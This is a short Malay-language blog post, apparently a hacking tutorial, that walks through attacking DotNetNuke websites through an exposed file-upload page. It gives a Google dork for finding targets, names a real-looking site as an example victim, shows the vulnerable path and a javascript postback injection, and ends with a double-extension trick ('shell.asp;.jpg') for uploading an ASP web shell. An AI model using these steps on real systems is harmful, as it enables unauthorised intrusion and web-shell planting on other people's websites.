Langkah 1: Cari target website
Gunakan “Google Dork” beritkut:
inurl:”/portals/0″ site:.com
Pilih satu website,
Contoh:
http://www.lucasmill.com/
Langkah 2: Test vulnerability
Tambahkan dibelakang web address, code berikut:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Contoh:
http://www.lucasmill.com/ Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Anda akan dapat gambar seperti dibawah:
Langkah 3: Pilih pilihan ke-3 “File (A File On Your Site)”
Langkah 4: Gantikan “Address Bar” dengan Java code berikut:
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
Langkah 5: Muatnaik file ke website
File yang boleh dimuat naik ialah ~ txt ~ swf ~ jpg ~ gif ~ pdf.
Langkah 6: Check File yang dimuatnaik
File yang dimuat naik boleh dijumpai di:
www.victim.com/portals/0/yourfile.extension
Contoh:
Nama file: pw.txt
File berikut boleh dijumpai di:
Untuk muatnaik asp shell, tukar:
shell.asp
menjadi:
shell.asp;.jpg
0 comments:
Post a Comment